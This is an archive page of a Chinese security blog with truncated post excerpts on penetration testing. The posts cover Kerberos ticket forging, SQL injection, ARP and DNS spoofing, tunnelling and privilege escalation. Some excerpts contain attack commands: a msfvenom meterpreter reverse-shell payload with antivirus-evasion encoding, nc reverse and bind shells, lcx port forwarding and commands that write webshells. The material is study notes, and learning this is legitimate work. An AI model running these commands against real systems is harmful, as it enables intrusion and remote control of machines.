03 2020 档案
摘要:目录应急响应流程防御模型SDL应急响应流程很多人认为应急响应就是脸上被黑的机器去查查什么情况,是不是被中了botnet病毒、是不是被人中了rootkit等,是不是被挂了webshell等。应急响应这件事情是一件技术含量非常高的事情,处理好了万事大吉,处理不好的话就很容易把系统搞崩溃,甚至引起一些不必要的情况。应急响应这件事儿,CSO和安全运营工程师的点其实不太一样,其实原因还是因为两个人的职责不一...
阅读全文
摘要:黄金票据是伪造 TGT,白银票据(Silver Ticket)是伪造 ST(Service Ticket),因为它不想黄金票据一样使用krbtgt账户的hash,而是使用计算机账户的hash进行加密的,所以只能获访问指定的权限。前提条件:域名称、域SID、域服务账户的hash、伪造的用户名(任意用户或者不存在的用户)制作白银票据 (上篇黄金票据已经截过图,主要使用用工具还是mimikatz和ps...
阅读全文
摘要:第一个问题:如何证明你本人是XXX用户的问题 由Authentication Server负责第二个问题:提供服务的服务器如何知道你有权限访问它提供的服务。当一个Client去访问Server服务器上的某服务时,Server如何判断Client是否有权限来访问自己主机上的服务。 由Ticket Granting Server负责针对Kerberos协议需要解决的第一个问题:如何证明你本人是XX...
阅读全文
摘要:目录明确目标分析风险,获得授权信息收集漏洞探测(手动&自动)漏洞验证信息分析利用漏洞,获取数据信息整理形成报告1.明确目标1)确定范围:测试的范围,如:IP、域名、内外网、整站or部分模块;2)确定规则:能渗透到什么程度(发现漏洞为止or继续利用漏洞)、时间限制、能否修改上传、能否提权...目标系统
阅读全文
摘要:目录区别和联系防御联系和区别相同点:XSS,CSRF,SSRF三种常见的Web服务端漏洞均是由于,服务器端对用户提供的可控数据过于信任或者过滤不严导致的。相同点:XSS,CSRF,SSRF三种常见的Web服务端漏洞均是由于,服务器端对用户提供的可控数据过于信任或者过滤不严导致的。不同点:XSS是服务器对用户输入的数据没有进行足够的过滤,导致客户端浏览器在渲染服务器返回的html页面时,出现了预期值...
阅读全文
摘要:SQL注入是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。 总结一句话:SQL注入实质就是闭合前
阅读全文
摘要:在本机电脑上自行搭建了一个练手的靶场,下面是记录渗透过程 目录 一、确认靶机ip 二、端口&目录扫描 三、查看敏感目录 四、sql注入 五、get shell 六、系统提权 确认靶机ip kali下有个工具可以扫描ip:netdiscover 看看哪一个比较可疑,在浏览器访问,最终确认是172 整理
阅读全文
摘要:在打vulnhub靶场的时候遇到的一个问题目录一、进到需要发送的安装包目录二、开启http服务三、访问服务器一、进到需要发送的安装包目录比如设置一个专门发送,传输的文件的文件夹,cmd命令打开即可以二、开启http服务 python2 python -m SimpleHTTPServer 9000
阅读全文
摘要:简单来说:一个用来做sql注入攻击的工具安装1,下载sqlmap.zip,下载环境;打开sqlmap官网https://github.com/sqlmapproject/sqlmap/ ;下载python-2.7.17.amd64.msi2.配置环境变量;(控制面板->系统和安全->系统->高级系统设置->环境变量)找到path 新建黏贴python地址(不明白的话可以自行百度,这就不细说安装了)...
阅读全文
摘要:在讲解osi七层模型之前,先认识一下网络认识网络:(一个家庭的网络)当我们家庭想要接网线时,运营商的人会在离你最近的一个站点,拉一根光纤到你家。然后光纤插到调制解调器(俗称的猫)的一端,猫的另一端连接我们的路由器。于是我们的路由器就具有连接外网的功能了。我们的台式机通过网线和路由器相连,我们的智能手机等其他的移动终端通过路由器的WIFI和外网相连。我们分配的IP地址是路由器通过DHCP分配的,分配...
阅读全文
摘要:学习了解kerberos协议,有助于我们后期理解黄金票据和白银票据的原理kerberos协议介绍kerberos 是一种由MIT(麻省理工大学)提出的一种网络身份验证协议,它旨在通过使用加密技术为客户端/服务端应用程序提供强大的认证服务。kerberos协议中主要由三个角色:(1)访问服务的client(一下表述为Client或者用户)(2)提供服务的server(一下表述为服务)(3)KDC(K...
阅读全文
摘要:承接上一章,除了arp欺骗之外对的欺骗方法a)使用kali,对dns文件进行编辑使用的欺骗工具是ettercap。对dns文件编辑:添加一个A记录,解释到kali自身:b)进行欺骗通过命令行模式打开图形界面,选择Unified sniffing以中间人的方式进行嗅探选择网卡,开那个段上就选择那个段上的网卡选择dns_spoofc) 最后我们开始我们的dns欺骗,点击Start sniffing然后...
阅读全文
摘要:这是我的学习总结,刚入坑网络安全,写的不好或者有什么错误的希望大佬们指正 首先了解ARP的作用以及原理: ARP(Address Resolution Protocol,地址解析协议)是一个位于TCP/IP栈中的网络层,负责将某个ip地址解析成对应的MAC地址,ARP协议的基本功能就是通过目标设备的
阅读全文
摘要:免杀 msfvenom encoder编码器 -e 编码器 -i 编码次数 多次编码 msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.5.172 lport=4444 -e x86/shikata_ga_nai -i 15
阅读全文
摘要:反弹shell 1.nc 正向连接 攻击机 nc-vv 受害者ip 受害者port 受害者 nc-lvvp受害者port - e /bin/bash 反向连接 攻击机 nc -lvvp 攻击机...
阅读全文
摘要:内网代理 http tunnel reDuh reGeorg 1.python2 安装 urllib3库 2.上传tunnel.nosocket.php代理脚本到web服务器 3.访问url,确认web服务器删tunnel。nosocket.php能够执行 4....
阅读全文
摘要:端口转发 lcx 流程 目标机 ./lcx -slave 跳板机ip 监听的端口 127.0.0.1 要转发的端口 跳板机(公网) ./lcx -listen 监听的端口 转发给攻击机访问的端口 攻击机 访问跳板机特定端口,即可访问到目标机特定端口 listen -listen <local por
阅读全文
摘要:3.权限维持 windows cmd命令 写webshell 1.使用cmd命令写webshell,带有以及“空格”的时候,需要使用^进行转义: 例如:echo ^ > shell.php linux cobaltstrike 生成后门 ...
阅读全文
摘要:服务提权 UDF提权 windows UDF mysql版本 < 5.1 , UDF导出到系统目录c:/windows/system32/ mysql版本>5.1 ,UDF导出到安静路径MYSQL/Lib/Plugin/ linux /usr/lib/mysql/plugin/ 要求有些权限,单引号
阅读全文
摘要:windows 系统漏洞、ms系列 ms08-067 rpc ms09-012 pr.exe/巴西烤肉提权 ms09-020 iis5/6 ms12-202 rdp蓝屏 ms17-010 永恒...
阅读全文
摘要:linux 系统信息 grep MemTotal /proc/meminfo #查看系统内存总量 cat /etc/issue #查看系统名称 cat /etc/lsb-release #查看系统名称、版本号 uname -a #查看内核信息 ls /root | grep vmlinuz #查看内
阅读全文
摘要:用户相关query user #查看当前在线的用户whoami #查看当前用户net user #查看当前系统全部用户net1 user #查看当前系统全部用户(高权限命令)net user /domain #查看当前域全部用户net user administrator #查看admin用户详细信息net localgroup #查看本地用户组net localgroup administrat...
阅读全文